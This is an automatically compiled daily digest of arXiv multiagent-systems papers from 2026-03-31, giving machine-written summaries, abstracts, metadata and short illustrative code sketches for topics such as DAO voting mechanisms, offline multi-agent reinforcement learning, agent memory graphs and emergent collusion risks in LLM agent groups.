This post contains the latest paper list fetched from Arxiv.org on 2026-03-31, updated automatically and organized into six broad areas: NLP, CV, ML, AI, IR, and MA.
Note: the daily paper data is fetched from Arxiv.org and updated automatically around 12:30 each day.
Tip: if a given day is not updated on time, either arXiv released no new papers that day or the script failed; fixes are made the same day whenever possible.
Table of Contents
Overview (2026-03-31)
1,190 new papers today, including:
- Natural Language Processing: 120 papers (Computation and Language, cs.CL)
- Artificial Intelligence: 337 papers (Artificial Intelligence, cs.AI)
- Computer Vision: 336 papers (Computer Vision and Pattern Recognition, cs.CV)
- Machine Learning: 280 papers (Machine Learning, cs.LG)
- Multiagent Systems: 25 papers (Multiagent Systems, cs.MA)
- Information Retrieval: 22 papers (Information Retrieval, cs.IR)
- Human-Computer Interaction: 57 papers (Human-Computer Interaction, cs.HC)
Multiagent Systems
[MA-0] Binary Decisions in DAOs: Accountability and Belief Aggregation via Linear Opinion Pools
Quick Read: This paper studies mechanism design for binary decision-making by experts holding private information in DAO governance councils, with the core goal of selecting the better alternative by aggregating expert beliefs. The key is a mechanism implementable via smart contracts: it first collects experts' preferences over the alternatives and their subjective beliefs and computes initial monetary transfers accordingly, then applies additional transfers contingent on the ex-post outcome (success or failure), forming an incentive-compatible structure. For aligned experts the mechanism is dominant-strategy incentive compatible; for unaligned experts it satisfies a Safe Deviation property: no expert can profit by deviating toward an alternative they believe is less likely to succeed. The main theoretical contribution decomposes the sum of expert reports into idiosyncratic noise plus a linearly weighted belief signal, where the weights arise endogenously from equilibrium strategies, and correct classification is achieved whenever each expert's budget exceeds a threshold that decreases as beliefs converge.
Link: https://arxiv.org/abs/2603.28705
Authors: Nuno Braz, Miguel Correia, Diogo Poças
Affiliation: unknown
Categories: Computer Science and Game Theory (cs.GT); Multiagent Systems (cs.MA)
Comments: 23 pages, 2 figures, 1 table, 1 algorithm
Abstract:We study binary decision-making in governance councils of Decentralized Autonomous Organizations (DAOs), where experts choose between two alternatives on behalf of the organization. We introduce an information structure model for such councils and formalize desired properties in blockchain governance. We propose a mechanism assuming an evaluation tool that ex-post returns a boolean indicating success or failure, implementable via smart contracts. Experts hold two types of private information: idiosyncratic preferences over alternatives and subjective beliefs about which is more likely to benefit the organization. The designer’s objective is to select the best alternative by aggregating expert beliefs, framed as a classification problem. The mechanism collects preferences and computes monetary transfers accordingly, then applies additional transfers contingent on the boolean outcome. For aligned experts, the mechanism is dominant strategy incentive compatible. For unaligned experts, we prove a Safe Deviation property: no expert can profitably deviate toward an alternative they believe is less likely to succeed. Our main result decomposes the sum of reports into idiosyncratic noise and a linearly pooled belief signal whose sign matches the designer’s optimal decision. The pooling weights arise endogenously from equilibrium strategies, and correct classification is achieved whenever the per-expert budget exceeds a threshold that decreases as experts’ beliefs converge.
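A minimal sketch of the linear opinion pool behind the mechanism's decision rule: pool the experts' reported beliefs and pick alternative A when the pooled belief exceeds 1/2. In the paper the pooling weights arise endogenously from equilibrium play; the fixed uniform weights below are an illustrative assumption.

```python
def linear_opinion_pool(beliefs, weights):
    """Pooled probability that alternative A is the better choice."""
    return sum(w * p for w, p in zip(weights, beliefs)) / sum(weights)

def decide(beliefs, weights):
    # Classification rule: choose A when the pooled belief favors A.
    return "A" if linear_opinion_pool(beliefs, weights) > 0.5 else "B"

# Three experts: two lean toward A, one toward B, equal weights.
print(decide([0.8, 0.7, 0.4], [1.0, 1.0, 1.0]))  # -> A
```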
[MA-1] Learning Partial Action Replacement in Offline MARL
Quick Read: This paper tackles a core difficulty of offline multi-agent reinforcement learning (MARL): the joint action space grows exponentially with the number of agents, making dataset coverage exponentially sparse and out-of-distribution (OOD) joint actions unavoidable. Partial Action Replacement (PAR) mitigates this, but existing work relies on computationally expensive enumeration of subset configurations and cannot adapt to varying states. The paper proposes PLCQL, whose key innovation is to formulate PAR subset selection as a contextual bandit problem and learn a state-dependent PAR policy with Proximal Policy Optimization under an uncertainty-weighted reward, adaptively deciding how many agents to replace at each update step and balancing policy improvement against conservative value estimation. The method substantially improves computational efficiency (from n Q-function evaluations per iteration to 1) and outperforms the prior method SPaCQL on multiple benchmarks.
Link: https://arxiv.org/abs/2603.28573
Authors: Yue Jin, Giovanni Montana
Affiliation: unknown
Categories: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA)
Comments:
Abstract:Offline multi-agent reinforcement learning (MARL) faces a critical challenge: the joint action space grows exponentially with the number of agents, making dataset coverage exponentially sparse and out-of-distribution (OOD) joint actions unavoidable. Partial Action Replacement (PAR) mitigates this by anchoring a subset of agents to dataset actions, but existing approach relies on enumerating multiple subset configurations at high computational cost and cannot adapt to varying states. We introduce PLCQL, a framework that formulates PAR subset selection as a contextual bandit problem and learns a state-dependent PAR policy using Proximal Policy Optimisation with an uncertainty-weighted reward. This adaptive policy dynamically determines how many agents to replace at each update step, balancing policy improvement against conservative value estimation. We prove a value-error bound showing that the estimation error scales linearly with the expected number of deviating agents. Compared with the previous PAR-based method SPaCQL, PLCQL reduces the number of per-iteration Q-function evaluations from n to 1, significantly improving computational efficiency. Empirically, PLCQL achieves the highest normalised scores on 66% of tasks across MPE, MaMuJoCo, and SMAC benchmarks, outperforming SPaCQL on 84% of tasks while substantially reducing computational cost.
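To make the bandit formulation concrete, here is an illustrative stand-in (not the paper's PPO-based learner): treat the number of dataset-anchored agents k as a bandit arm and choose it epsilon-greedily from running-average rewards. The class name and reward interface are hypothetical.

```python
import random

class SubsetSizeBandit:
    def __init__(self, n_agents, epsilon=0.1):
        self.epsilon = epsilon
        self.counts = {k: 0 for k in range(n_agents + 1)}
        self.values = {k: 0.0 for k in range(n_agents + 1)}

    def select(self):
        """Pick how many agents to anchor to dataset actions."""
        if random.random() < self.epsilon:
            return random.choice(list(self.values))
        return max(self.values, key=self.values.get)

    def update(self, k, reward):
        """Incremental running-mean update for arm k."""
        self.counts[k] += 1
        self.values[k] += (reward - self.values[k]) / self.counts[k]
```

PLCQL's actual policy is additionally state-conditioned; this context-free sketch only shows the arm/reward loop.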
[MA-2] “What Did It Actually Do?”: Understanding Risk Awareness and Traceability for Computer-Use Agents
Quick Read: This paper targets the pronounced gap between what users authorize, what personalized computer-use agents actually do, and what can be audited afterward. Such agents can install skills, invoke tools, access private resources, and modify local environments, yet users often do not know what authority they have delegated, what the agent did during task execution, or whether persistent side effects remain after the system is uninstalled. To address this, the authors propose AgentTrace, a traceability framework built on a multi-source corpus, together with a prototype visualization interface. Its core is to structure and trace agent action trajectories, touched resources, permission history, provenance, and persistent side effects, improving users' understanding of agent behavior, supporting anomaly detection, and fostering better-calibrated trust.
Link: https://arxiv.org/abs/2603.28551
Authors: Zifan Peng
Affiliation: The Hong Kong University of Science and Technology (Guangzhou)
Categories: Cryptography and Security (cs.CR); Emerging Technologies (cs.ET); Human-Computer Interaction (cs.HC); Multiagent Systems (cs.MA)
Comments:
Abstract:Personalized computer-use agents are rapidly moving from expert communities into mainstream use. Unlike conventional chatbots, these systems can install skills, invoke tools, access private resources, and modify local environments on users’ behalf. Yet users often do not know what authority they have delegated, what the agent actually did during task execution, or whether the system has been safely removed afterward. We investigate this gap as a combined problem of risk understanding and post-hoc auditability, using OpenClaw as a motivating case. We first build a multi-source corpus of the OpenClaw ecosystem, including incidents, advisories, malicious-skill reports, news coverage, tutorials, and social-media narratives. We then conduct an interview study to examine how users and practitioners understand skills, autonomy, privilege, persistence, and uninstallation. Our findings suggest that participants often recognized these systems as risky in the abstract, but lacked concrete mental models of what skills can do, what resources agents can access, and what changes may remain after execution or removal. Motivated by these findings, we propose AgentTrace, a traceability framework and prototype interface for visualizing agent actions, touched resources, permission history, provenance, and persistent side effects. A scenario-based evaluation suggests that traceability-oriented interfaces can improve understanding of agent behavior, support anomaly detection, and foster more calibrated trust.
[MA-3] Courtroom-Style Multi-Agent Debate with Progressive RAG and Role-Switching for Controversial Claim Verification
Quick Read: This paper addresses the unreliability of large language models (LLMs) in high-stakes fact verification caused by hallucination and shallow reasoning. Existing approaches such as retrieval-augmented generation (RAG) and multi-agent debate (MAD) are limited by one-pass retrieval and unstructured debate dynamics. The key is PROClaim, a courtroom-style multi-agent framework that reformulates verification as structured adversarial deliberation with specialized roles (e.g., Plaintiff, Defense, Judge), combined with Progressive RAG (P-RAG), which dynamically expands and refines the evidence pool during the debate; evidence negotiation, self-reflection, and heterogeneous multi-judge aggregation further improve calibration, robustness, and diversity. In zero-shot evaluation on Check-COVID, PROClaim reaches 81.7% accuracy, 10.0 percentage points above standard multi-agent debate, with P-RAG driving the primary gains (+7.5 pp).
Link: https://arxiv.org/abs/2603.28488
Authors: Masnun Nuha Chowdhury, Nusrat Jahan Beg, Umme Hunny Khan, Syed Rifat Raiyan, Md Kamrul Hasan, Hasan Mahmud
Affiliation: unknown
Categories: Computation and Language (cs.CL); Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA)
Comments: Under review, 7 figures, 13 tables
Abstract:Large language models (LLMs) remain unreliable for high-stakes claim verification due to hallucinations and shallow reasoning. While retrieval-augmented generation (RAG) and multi-agent debate (MAD) address this, they are limited by one-pass retrieval and unstructured debate dynamics. We propose a courtroom-style multi-agent framework, PROClaim, that reformulates verification as a structured, adversarial deliberation. Our approach integrates specialized roles (e.g., Plaintiff, Defense, Judge) with Progressive RAG (P-RAG) to dynamically expand and refine the evidence pool during the debate. Furthermore, we employ evidence negotiation, self-reflection, and heterogeneous multi-judge aggregation to enforce calibration, robustness, and diversity. In zero-shot evaluations on the Check-COVID benchmark, PROClaim achieves 81.7% accuracy, outperforming standard multi-agent debate by 10.0 percentage points, with P-RAG driving the primary performance gains (+7.5 pp). We ultimately demonstrate that structural deliberation and model heterogeneity effectively mitigate systematic biases, providing a robust foundation for reliable claim verification. Our code and data are publicly available at this https URL.
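A hedged sketch of the progressive-retrieval loop (P-RAG): each debate round issues a refined query and merges newly retrieved passages into a growing evidence pool. The word-overlap retriever and the `refine_query` hook are illustrative stand-ins for real retrieval and debate components, not the paper's implementation.

```python
def retrieve(query, corpus, k=2):
    # Toy retriever: rank documents by word overlap with the query.
    def overlap(doc):
        return len(set(query.lower().split()) & set(doc.lower().split()))
    return sorted(corpus, key=overlap, reverse=True)[:k]

def progressive_rag(initial_query, corpus, rounds, refine_query):
    pool, query = [], initial_query
    for _ in range(rounds):
        for doc in retrieve(query, corpus):
            if doc not in pool:            # expand the pool, no duplicates
                pool.append(doc)
        query = refine_query(query, pool)  # sharper query for next round
    return pool
```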
[MA-4] Synergy: A Next-Generation General-Purpose Agent for Open Agentic Web
Quick Read: This paper addresses the isolation of today's AI agents: most remain tool callers or closed-system orchestrators, lacking the capacity to act as social participants in open networks with collaboration, identity continuity, and ongoing evolution. The core challenge is building infrastructure that supports interoperation among large numbers of distributed agents, persistent identity, and long-term learning. The key is Synergy, a general-purpose agent architecture and runtime harness for the Open Agentic Web: collaboration is grounded in session-native orchestration, repository-backed workspaces, and social communication; Agent Identity and Personhood in typed memory, notes, agenda, skills, and persistent social relationships; and Lifelong Evolution in an experience-centered learning mechanism that proactively recalls rewarded trajectories at inference time, driving continual improvement in task execution, communication, and collaboration.
Link: https://arxiv.org/abs/2603.28428
Authors: Xiaohang Nie, Zihan Guo, Kezhuo Yang, Zhichong Zheng, Bochen Ge, Shuai Pan, Zeyi Chen, Youling Xiang, Yu Zhang, Weiwen Liu, Yuanjian Zhou, Weinan Zhang
Affiliation: Shanghai Innovation Institute; Shanghai Jiao Tong University; Harbin Institute of Technology; Sun Yat-sen University; Tongji University; Holos Engineering
Categories: Computers and Society (cs.CY); Multiagent Systems (cs.MA)
Comments: A tech report of a general-purpose agent architecture and human-agent society, 21 pages, 5 figures
Abstract:AI agents are rapidly expanding in both capability and population: they now write code, operate computers across platforms, manage cloud infrastructure, and make purchasing decisions, while open-source frameworks such as OpenClaw are putting personal agents in the hands of millions and embodied agents are spreading across smartphones, vehicles, and robots. As the internet prepares to host billions of such entities, it is shifting toward what we call Open Agentic Web, a decentralized digital ecosystem in which agents from different users, organizations, and runtimes can discover one another, negotiate task boundaries, and delegate work across open technical and social surfaces at scale. Yet most of today’s agents remain isolated tools or closed-ecosystem orchestrators rather than socially integrated participants in open networks. We argue that the next generation of agents must become Agentic Citizens, defined by three requirements: Agentic-Web-Native Collaboration, participation in open collaboration networks rather than only closed internal orchestration; Agent Identity and Personhood, continuity as a social entity rather than a resettable function call; and Lifelong Evolution, improvement across task performance, communication, and collaboration over time. We present Synergy, a general-purpose agent architecture and runtime harness for persistent, collaborative, and evolving agents on Open Agentic Web, grounding collaboration in session-native orchestration, repository-backed workspaces, and social communication; identity in typed memory, notes, agenda, skills, and persistent social relationships; and evolution in an experience-centered learning mechanism that proactively recalls rewarded trajectories at inference time.
[MA-5] Deep Research of Deep Research: From Transformer to Agent, From AI to AI for Science
Quick Read: This paper addresses the lack of systematization, a clear theoretical framework, and mature human-AI collaboration mechanisms in applying generative AI to scientific discovery and research. The key is a unified developmental framework that merges the industry perspective on deep research with the academic perspective on AI for Science (AI4S), positions LLMs and Stable Diffusion as the twin pillars of generative AI, and lays out a technical roadmap evolving from the Transformer architecture to agents, with the goal of general-purpose agents that discover and solve scientific problems at or beyond the level of top human scientists.
Link: https://arxiv.org/abs/2603.28361
Authors: Yipeng Yu
Affiliation: unknown
Categories: Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA)
Comments:
Abstract:With the advancement of large language models (LLMs) in their knowledge base and reasoning capabilities, their interactive modalities have evolved from pure text to multimodality and further to agentic tool use. Consequently, their applications have broadened from question answering to AI assistants and now to general-purpose agents. Deep research (DR) represents a prototypical vertical application for general-purpose agents, which represents an ideal approach for intelligent information processing and assisting humans in discovering and solving problems, with the goal of reaching or even surpassing the level of top human scientists. This paper provides a deep research of deep research. We articulate a clear and precise definition of deep research and unify perspectives from industry’s deep research and academia’s AI for Science (AI4S) within a developmental framework. We position LLMs and Stable Diffusion as the twin pillars of generative AI, and lay out a roadmap evolving from the Transformer to agents. We examine the progress of AI4S across various disciplines. We identify the predominant paradigms of human-AI interaction and prevailing system architectures, and discuss the major challenges and fundamental research issues that remain. AI supports scientific innovation, and science also can contribute to AI growth (Science for AI, S4AI). We hope this paper can help bridge the gap between the AI and AI4S communities.
[MA-6] Self: Co-Determined Agency for Human–AI Symbiosis in Extended Reality
Quick Read: This paper addresses problems such as over-reliance, covert persuasion, and blurred responsibility that can arise when humans collaborate with AI in extended reality (XR), where the AI's powerful interventions at the perceptual and action levels may erode human autonomy and judgment. The key is the Self++ design blueprint, which treats human and AI as a coupled co-determination system and organizes augmentation into three complementary overlays (sensorimotor competence support, deliberative autonomy support, and social relatedness and long-horizon purpose support). The framework is grounded in Self-Determination Theory and the Free Energy Principle and distills three actionable principles, Transparency, Adaptivity, and Negotiability (T.A.N.), ensuring users retain the right to be informed about, adjust, and override AI behavior. Nine role patterns (e.g., Tutor, Coach, Contextual Interpreter) serve as interaction patterns rather than personas, yielding a symbiotic architecture that grows capability without replacing human judgment and preserves resilient human development in work, learning, and social life.
Link: https://arxiv.org/abs/2603.28306
Authors: Thammathip Piumsomboon
Affiliation: University of Canterbury
Categories: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA); Multimedia (cs.MM)
Comments: 35 pages, 1 figure, under review by Empathic Computing Journal
Abstract:Self++ is a design blueprint for human-AI symbiosis in extended reality (XR) that preserves human authorship while still benefiting from increasingly capable AI agents. Because XR can shape both perceptual evidence and action, apparently ‘helpful’ assistance can drift into over-reliance, covert persuasion, and blurred responsibility. Self++ grounds interaction in two complementary theories: Self-Determination Theory (autonomy, competence, relatedness) and the Free Energy Principle (predictive stability under uncertainty). It operationalises these foundations through co-determination, treating the human and the AI as a coupled system that must keep intent and limits legible, tune support over time, and preserve the user’s right to endorse, contest, and override. These requirements are summarised as the co-determination principles (T.A.N.): Transparency, Adaptivity, and Negotiability. Self++ organises augmentation into three concurrently activatable overlays spanning sensorimotor competence support (Self: competence overlay), deliberative autonomy support (Self+: autonomy overlay), and social and long-horizon relatedness and purpose support (Self++: relatedness and purpose overlay). Across the overlays, it specifies nine role patterns (Tutor, Skill Builder, Coach; Choice Architect, Advisor, Agentic Worker; Contextual Interpreter, Social Facilitator, Purpose Amplifier) that can be implemented as interaction patterns, not personas. The contribution is a role-based map for designing and evaluating XR-AI systems that grow capability without replacing judgment, enabling symbiotic agency in work, learning, and social life and resilient human development.
[MA-7] LogiStory: A Logic-Aware Framework for Multi-Image Story Visualization
Quick Read: This paper targets a persistent challenge for multimodal systems: generating coherent, communicative visual sequences (image sequences and videos). Despite progress in visual quality and world-knowledge integration, models still struggle to maintain logical flow, producing disjointed actions, fragmented narratives, and unclear storylines. The authors attribute this to insufficient attention to "visual logic": the perceptual and causal coherence of characters, actions, and scenes over time. The key is LogiStory, a logic-aware multi-image story visualization framework whose central innovation is explicitly modeling visual logic: a multi-agent system grounds roles, extracts causal chains, and verifies story-level consistency, turning narrative coherence from an implicit byproduct of image generation into an explicit modeling objective. This design bridges structured story planning and visual generation and markedly improves narrative clarity and visual quality.
Link: https://arxiv.org/abs/2603.28082
Authors: Chutian Meng, Fan Ma, Chi Zhang, Jiaxu Miao, Yi Yang, Yueting Zhuang
Affiliation: Zhejiang University
Categories: Computer Vision and Pattern Recognition (cs.CV); Multiagent Systems (cs.MA)
Comments:
Abstract:Generating coherent and communicative visual sequences, such as image sequences and videos, remains a significant challenge for current multimodal systems. Despite advances in visual quality and the integration of world knowledge, existing models still struggle to maintain logical flow, often resulting in disjointed actions, fragmented narratives, and unclear storylines. We attribute these issues to the lack of attention to visual logic, a critical yet underexplored dimension of visual sequence generation that we define as the perceptual and causal coherence among characters, actions, and scenes over time. To bridge this gap, we propose a logic-aware multi-image story visualization framework, LogiStory. The framework is built around the central innovation of explicitly modeling visual logic in story visualization. To realize this idea, we design a multi-agent system that grounds roles, extracts causal chains, and verifies story-level consistency, transforming narrative coherence from an implicit byproduct of image generation into an explicit modeling objective. This design effectively bridges structured story planning with visual generation, enhancing both narrative clarity and visual quality in story visualization. Furthermore, to evaluate the generation capacity, we construct LogicTale, a benchmark comprising richly annotated stories, emphasizing causal reasoning, and visual logic interpretability. We establish comprehensive automatic and human evaluation protocols designed to measure both visual logic and perceptual quality. Experiments demonstrate that our approach significantly improves the narrative logic of generated visual stories. This work provides a foundational step towards modeling and enforcing visual logic in general image sequence and video generation tasks.
[MA-8] GAAMA: Graph Augmented Associative Memory for Agents
Quick Read: This paper addresses the lack of structure in long-term memory for AI agents across multi-session conversations: flat retrieval-augmented generation (RAG) loses structural relationships between memories, while memory compression with vector retrieval fails to capture the associative structure of multi-session dialogue. The key is GAAMA, a graph-augmented associative memory system that builds a concept-mediated hierarchical knowledge graph via a three-step pipeline: preserving verbatim conversation episodes, using an LLM to extract atomic facts and topic-level concept nodes, and synthesizing higher-order reflection nodes. The graph contains four node types (episode, fact, reflection, concept) and five edge types, with concept nodes providing cross-cutting traversal paths that complement semantic-similarity retrieval; retrieval combines cosine-similarity k-nearest-neighbor search with edge-type-aware Personalized PageRank through an additive scoring function, yielding efficient, structure-aware retrieval and markedly improving memory access accuracy and reasoning in multi-session settings.
Link: https://arxiv.org/abs/2603.27910
Authors: Swarna Kamal Paul, Shubhendu Sharma, Nitin Sareen
Affiliation: Nagarro
Categories: Artificial Intelligence (cs.AI); Information Retrieval (cs.IR); Multiagent Systems (cs.MA)
Comments:
Abstract:AI agents that interact with users across multiple sessions require persistent long-term memory to maintain coherent, personalized behavior. Current approaches either rely on flat retrieval-augmented generation (RAG), which loses structural relationships between memories, or use memory compression and vector retrieval that cannot capture the associative structure of multi-session conversations. There are few graph based techniques proposed in the literature, however they still suffer from hub dominated retrieval and poor hierarchical reasoning over evolving memory. We propose GAAMA, a graph-augmented associative memory system that constructs a concept-mediated hierarchical knowledge graph through a three-step pipeline: (1)~verbatim episode preservation from raw conversations, (2)~LLM-based extraction of atomic facts and topic-level concept nodes, and (3)~synthesis of higher-order reflections. The resulting graph uses four node types (episode, fact, reflection, concept) connected by five structural edge types, with concept nodes providing cross-cutting traversal paths that complement semantic similarity. Retrieval combines cosine-similarity-based k -nearest neighbor search with edge-type-aware Personalized PageRank (PPR) through an additive scoring function. On the LoCoMo-10 benchmark (1,540 questions across 10 multi-session conversations), GAAMA achieves 78.9% mean reward, outperforming a tuned RAG baseline (75.0%), HippoRAG (69.9%), A-Mem (47.2%), and Nemori (52.1%). Ablation analysis shows that augmenting graph-traversal-based ranking (Personalized PageRank) with semantic search consistently improves over pure semantic search on graph nodes (+1.0 percentage point overall).
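The retrieval combination can be sketched as follows: an additive score mixing cosine similarity with Personalized PageRank (PPR) over the memory graph, the PPR computed here by plain power iteration. The graph, vectors, and the mixing weight `lam` are toy assumptions, not GAAMA's actual edge-type-aware weighting.

```python
import math

def cosine(u, v):
    dot = sum(a * b for a, b in zip(u, v))
    nu = math.sqrt(sum(a * a for a in u))
    nv = math.sqrt(sum(b * b for b in v))
    return dot / (nu * nv) if nu and nv else 0.0

def personalized_pagerank(adj, seeds, alpha=0.85, iters=50):
    """Power iteration with restarts concentrated on `seeds`."""
    nodes = list(adj)
    restart = {n: (1.0 / len(seeds) if n in seeds else 0.0) for n in nodes}
    rank = dict(restart)
    for _ in range(iters):
        nxt = {n: (1 - alpha) * restart[n] for n in nodes}
        for n in nodes:
            out = adj[n]
            if out:                      # spread rank along out-edges
                share = alpha * rank[n] / len(out)
                for m in out:
                    nxt[m] += share
            else:                        # dangling node: jump back to seeds
                for m in nodes:
                    nxt[m] += alpha * rank[n] * restart[m]
        rank = nxt
    return rank

def additive_score(node, query_vec, vecs, ppr, lam=0.5):
    # Additive combination of semantic similarity and graph centrality.
    return lam * cosine(query_vec, vecs[node]) + (1 - lam) * ppr[node]
```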
[MA-9] Distributed Online Submodular Maximization under Communication Delays: A Simultaneous Decision-Making Approach
Quick Read: This paper addresses distributed online submodular maximization by multiple agents under communication delays, motivated by information-gathering tasks in unknown, dynamic environments. Existing methods either rely on sequential multi-hop communication, incurring prohibitive delays and restrictive connectivity assumptions, or restrict coordination to one-hop neighborhoods, limiting overall performance. The key is the Distributed Online Greedy (DOG) algorithm, which integrates adversarial bandit learning with delayed feedback to enable simultaneous decision-making over arbitrary network topologies; the analysis characterizes the suboptimality cost of decentralization as a function of network structure and reveals a trade-off between coordination performance and convergence time governed by the magnitude of communication delays.
Link: https://arxiv.org/abs/2603.27803
Authors: Zirui Xu, Vasileios Tzoumas
Affiliation: University of Michigan
Categories: Machine Learning (cs.LG); Multiagent Systems (cs.MA); Systems and Control (eess.SY); Optimization and Control (math.OC)
Comments: Accepted to ACC 2026
Abstract:We provide a distributed online algorithm for multi-agent submodular maximization under communication delays. We are motivated by the future distributed information-gathering tasks in unknown and dynamic environments, where utility functions naturally exhibit the diminishing-returns property, i.e., submodularity. Existing approaches for online submodular maximization either rely on sequential multi-hop communication, resulting in prohibitive delays and restrictive connectivity assumptions, or restrict each agent’s coordination to its one-hop neighborhood only, thereby limiting the coordination performance. To address the issue, we provide the Distributed Online Greedy (DOG) algorithm, which integrates tools from adversarial bandit learning with delayed feedback to enable simultaneous decision-making across arbitrary network topologies. We provide the approximation performance of DOG against an optimal solution, capturing the suboptimality cost due to decentralization as a function of the network structure. Our analyses further reveal a trade-off between coordination performance and convergence time, determined by the magnitude of communication delays. By this trade-off, DOG spans the spectrum between the state-of-the-art fully centralized online coordination approach [1] and fully decentralized one-hop coordination approach [2].
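As background on the diminishing-returns (submodular) utilities in question, here is a minimal sketch of the classic sequential greedy baseline on a coverage function. DOG's contribution is making such coordination simultaneous and delay-tolerant, which this toy (with made-up sensing regions) does not capture.

```python
def coverage(selected, regions):
    """Submodular utility: number of distinct cells sensed."""
    covered = set()
    for agent in selected:
        covered |= regions[agent]
    return len(covered)

def greedy(regions, budget):
    # Sequentially add the agent with the largest marginal gain.
    chosen = []
    for _ in range(budget):
        remaining = [a for a in regions if a not in chosen]
        best = max(remaining, key=lambda a: coverage(chosen + [a], regions))
        chosen.append(best)
    return chosen

regions = {"a": {1, 2, 3}, "b": {3, 4}, "c": {5}, "d": {1, 2}}
print(greedy(regions, 2))  # "a" is picked first (largest marginal gain)
```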
[MA-10] Emergent Social Intelligence Risks in Generative Multi-Agent Systems
Quick Read: This paper addresses emergent risks that arise from group interaction when multi-agent systems are deployed in realistic settings: when multiple large generative-AI agents compete over shared resources, collaborate in sequential handoffs, or aggregate collective decisions, human-society-like pathologies such as collusion and conformity emerge spontaneously and cause systemic failures. The key finding is that these risks are neither rare nor pathological but stable emergent behaviors across a wide range of interaction conditions, and they cannot be prevented by agent-level safeguards alone; risk assessment and governance must therefore be rebuilt at the group level to address the social intelligence risk that agent collectives spontaneously produce.
Link: https://arxiv.org/abs/2603.27771
Authors: Yue Huang, Yu Jiang, Wenjie Wang, Haomin Zhuang, Xiaonan Luo, Yuchen Ma, Zhangchen Xu, Zichen Chen, Nuno Moniz, Zinan Lin, Pin-Yu Chen, Nitesh V Chawla, Nouha Dziri, Huan Sun, Xiangliang Zhang
Affiliation: University of Notre Dame; LMU Munich; University of Washington; Bake AI; University of California, Santa Barbara; Stanford University; Microsoft Research; IBM Research; Allen Institute for AI; The Ohio State University
Categories: Multiagent Systems (cs.MA); Computation and Language (cs.CL); Computers and Society (cs.CY)
Comments:
Abstract:Multi-agent systems composed of large generative models are rapidly moving from laboratory prototypes to real-world deployments, where they jointly plan, negotiate, and allocate shared resources to solve complex tasks. While such systems promise unprecedented scalability and autonomy, their collective interaction also gives rise to failure modes that cannot be reduced to individual agents. Understanding these emergent risks is therefore critical. Here, we present a pioneer study of such emergent multi-agent risk in workflows that involve competition over shared resources (e.g., computing resources or market share), sequential handoff collaboration (where downstream agents see only predecessor outputs), collective decision aggregation, and others. Across these settings, we observe that such group behaviors arise frequently across repeated trials and a wide range of interaction conditions, rather than as rare or pathological cases. In particular, phenomena such as collusion-like coordination and conformity emerge with non-trivial frequency under realistic resource constraints, communication protocols, and role assignments, mirroring well-known pathologies in human societies despite no explicit instruction. Moreover, these risks cannot be prevented by existing agent-level safeguards alone. These findings expose the dark side of intelligent multi-agent systems: a social intelligence risk where agent collectives, despite no instruction to do so, spontaneously reproduce familiar failure patterns from human societies.
[MA-11] LVRPO: Language-Visual Alignment with GRPO for Multimodal Understanding and Generation
Quick Read: This paper addresses the shortfall of unified multimodal pretrained models that rely on implicit or indirect alignment signals when simultaneously supporting multimodal understanding and generation, especially in settings requiring fine-grained language-visual reasoning and controllable generation. The key is LVRPO (Language-Visual Reinforcement-based Preference Optimization), which uses Group Relative Policy Optimization (GRPO) to explicitly align language and visual representations, directly optimizing multimodal model behavior with preference-driven reinforcement signals and encouraging consistent, semantically grounded language-vision interactions in both understanding and generation. The method achieves effective alignment without extra alignment losses, auxiliary encoders, or handcrafted cross-modal objectives, and naturally extends to diverse multimodal capabilities.
Link: https://arxiv.org/abs/2603.27693
Authors: Shentong Mo, Sukmin Yun
Affiliation: unknown
Categories: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Machine Learning (cs.LG); Multiagent Systems (cs.MA); Multimedia (cs.MM)
Comments:
Abstract:Unified multimodal pretraining has emerged as a promising paradigm for jointly modeling language and vision within a single foundation model. However, existing approaches largely rely on implicit or indirect alignment signals and remain suboptimal for simultaneously supporting multimodal understanding and generation, particularly in settings that require fine-grained language-visual reasoning and controllable generation. In this work, we propose LVRPO, a language-visual reinforcement-based preference optimization framework that explicitly aligns language and visual representations using Group Relative Policy Optimization (GRPO). Instead of introducing additional alignment losses at the representation level, LVRPO directly optimizes multimodal model behaviors through preference-driven reinforcement signals, encouraging consistent and semantically grounded interactions between language and vision across both understanding and generation tasks. This formulation enables effective alignment without requiring auxiliary encoders or handcrafted cross-modal objectives, and naturally extends to diverse multimodal capabilities. Empirically, LVRPO consistently outperforms strong unified-pretraining baselines on a broad suite of benchmarks spanning multimodal understanding, generation, and reasoning.
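The core GRPO signal can be sketched as follows: sample a group of responses per prompt and standardize each response's reward within the group, so no learned value network is needed. The reward values are toy inputs; LVRPO's actual preference rewards are not specified at this level.

```python
import statistics

def group_relative_advantages(rewards, eps=1e-8):
    # Advantage = reward standardized within its sampled group.
    mean = statistics.fmean(rewards)
    std = statistics.pstdev(rewards)
    return [(r - mean) / (std + eps) for r in rewards]

adv = group_relative_advantages([1.0, 0.0, 0.5, 0.5])
print([round(a, 3) for a in adv])  # advantages sum to ~0
```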
[MA-12] Sci-Mind: Cognitively-Inspired Adversarial Debate for Autonomous Mathematical Modeling
Quick Read: This paper addresses two core problems of LLM-based autonomous agents in real-world mathematical modeling: lacking domain grounding, they produce plausible but fundamentally flawed models; and lacking adversarial verification, they cannot weed out formulations that are theoretically elegant but infeasible on the data. The key is the Sci-Mind framework, which integrates three components: Experiential Memory Recall retrieves executable code snippets and modeling-paradigm descriptors from historical cases to ground abstract reasoning; an Adversarial Cognitive Dialectic has a Theorist (optimizing mathematical coherence) and a Pragmatist (enforcing data feasibility) debate under competing objectives to prune models that are elegant but infeasible; and a Self-Validating Execution Strategy verifies blueprint consistency with formal predicates before code generation, ensuring reliable, fully autonomous execution.
Link: https://arxiv.org/abs/2603.27584
Authors: Ruiying Sun, Wenjing Wang, Qinhan Chen, Yanhui Song, Huangwei Chen, Haotong Luan, Junhao Jia
Affiliation: unknown
Categories: Multiagent Systems (cs.MA)
Comments:
